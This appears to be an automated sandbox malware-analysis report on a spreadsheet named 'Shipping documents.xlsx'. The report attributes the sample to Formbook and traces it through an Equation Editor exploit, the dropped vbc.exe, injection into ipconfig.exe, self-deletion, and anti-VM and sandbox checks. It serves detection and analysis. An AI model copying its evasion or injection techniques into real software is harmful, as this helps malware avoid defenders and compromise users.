Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023D7B00	7_2_023D7B00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02436BCB	7_2_02436BCB
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0243DBDA	7_2_0243DBDA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0245CBA4	7_2_0245CBA4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023AFBD7	7_2_023AFBD7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023D286D	7_2_023D286D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023BC85C	7_2_023BC85C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0242F8C4	7_2_0242F8C4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0244F8EE	7_2_0244F8EE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0243394B	7_2_0243394B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02435955	7_2_02435955
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023B29B2	7_2_023B29B2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023C69FE	7_2_023C69FE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0245098E	7_2_0245098E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023E2E2F	7_2_023E2E2F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023CEE4C	7_2_023CEE4C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023C0F3F	7_2_023C0F3F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023DDF7C	7_2_023DDF7C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02422FDC	7_2_02422FDC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0244CFB1	7_2_0244CFB1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023E0D3B	7_2_023E0D3B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023BCD5B	7_2_023BCD5B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0244FDDD	7_2_0244FDDD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0009C7DE	7_2_0009C7DE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_00088C6B	7_2_00088C6B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_00088C70	7_2_00088C70
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_00082D90	7_2_00082D90
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_00082FB0	7_2_00082FB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_005167C7	7_2_005167C7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_00515062	7_2_00515062
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_005132FF	7_2_005132FF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_00511362	7_2_00511362
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_00513302	7_2_00513302
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_005175B2	7_2_005175B2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_005108F9	7_2_005108F9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_00510902	7_2_00510902

Source: Shipping documents.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 023ADF5C appears 123 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 023F373B appears 245 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 023F3F92 appears 132 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 023AE2A8 appears 38 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 0241F970 appears 84 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0091E2A8 appears 38 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0091DF5C appears 121 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0098F970 appears 84 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0096373B appears 245 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00963F92 appears 132 times

Source: 00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2344836687.00000000002F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2136258521.0000000003341000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2344806052.00000000002C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2170693732.00000000000F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2170740872.0000000000180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2170766828.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2136301403.00000000033BB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: vbc[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: explorer.exe, 00000006.00000000.2144874723.0000000003C40000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@9/6@11/11

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Shipping documents.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD059.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Shipping documents.xlsx

ReversingLabs: Detection: 33%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown	Process created: C:\Users\Public\vbc.exe {path}
Source: unknown	Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe {path}	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: ipconfig.pdb source: vbc.exe, 00000005.00000003.2169920135.000000000081C000.00000004.00000001.sdmp
Source:	Binary string: ipconfig.pdbN source: vbc.exe, 00000005.00000003.2169920135.000000000081C000.00000004.00000001.sdmp
Source:	Binary string: .pDBl source: vbc.exe, 00000004.00000002.2135911744.0000000002374000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, ipconfig.exe

Source: Shipping documents.xlsx

Initial sample: OLE indicators vbamacros = False

Source: Shipping documents.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: vbc[1].exe.2.dr, SimpleTextEditor/LoginForm.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: vbc.exe.2.dr, SimpleTextEditor/LoginForm.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.vbc.exe.ec0000.2.unpack, SimpleTextEditor/LoginForm.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.vbc.exe.ec0000.0.unpack, SimpleTextEditor/LoginForm.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.ec0000.0.unpack, SimpleTextEditor/LoginForm.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.vbc.exe.ec0000.3.unpack, SimpleTextEditor/LoginForm.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00EC8AB2 push ss; iretd	4_2_00EC8CE6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00EC8088 push 00000000h; iretd	4_2_00EC82A0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00EC8981 push ss; iretd	4_2_00EC8CE6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00492993 pushad ; iretd	4_2_0049299A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B3C5 push eax; ret	5_2_0041B418
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B47C push eax; ret	5_2_0041B482
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B412 push eax; ret	5_2_0041B418
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B41B push eax; ret	5_2_0041B482
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004154C6 push 00000007h; iretd	5_2_004154E9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041552A push es; iretd	5_2_004155AE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041558B push es; iretd	5_2_004155AE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00EC8088 push 00000000h; iretd	5_2_00EC82A0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00EC8981 push ss; iretd	5_2_00EC8CE6
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00EC8AB2 push ss; iretd	5_2_00EC8CE6
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0091DFA1 push ecx; ret	5_2_0091DFB4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_023ADFA1 push ecx; ret	7_2_023ADFB4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0009B3C5 push eax; ret	7_2_0009B418
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0009B41B push eax; ret	7_2_0009B482
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0009B412 push eax; ret	7_2_0009B418
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0009B47C push eax; ret	7_2_0009B482
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_000954C6 push 00000007h; iretd	7_2_000954E9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0009552A push es; iretd	7_2_000955AE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_0009558B push es; iretd	7_2_000955AE

Source: initial sample	Static PE information: section name: .text entropy: 7.70882219483
Source: initial sample	Static PE information: section name: .text entropy: 7.70882219483

Persistence and Installation Behavior:

Uses ipconfig to lookup or modify the Windows network settings

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Users\Public\vbc.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ASP.NET_4.0.30319\Names

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: Shipping documents.xlsx

Stream path 'EncryptedPackage' entropy: 7.99819881034 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000004.00000002.2136150916.0000000002554000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 532, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME8
Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL8

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: 00000000000885F4 second address: 00000000000885FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\Public\vbc.exe

Code function: 5_2_004088C0 rdtsc

5_2_004088C0

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\Public\vbc.exe

Window / User API: threadDelayed 653

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2552	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2792	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2792	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2664	Thread sleep time: -41500s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2740	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1552	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 1688	Thread sleep time: -38000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe	Last function: Thread delayed

Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmp	Binary or memory string: VMWARE8
Source: explorer.exe, 00000006.00000002.2344827984.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2146046712.0000000004234000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.2146086153.0000000004263000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmp	Binary or memory string: VMWAREHD?m
Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II8
Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmp	Binary or memory string: VMware HD?m
Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmp	Binary or memory string: QEMU8
Source: vbc.exe, 00000004.00000002.2136238282.0000000002663000.00000004.00000001.sdmp	Binary or memory string: >m"SOFTWARE\VMware, Inc.\VMware Tools8
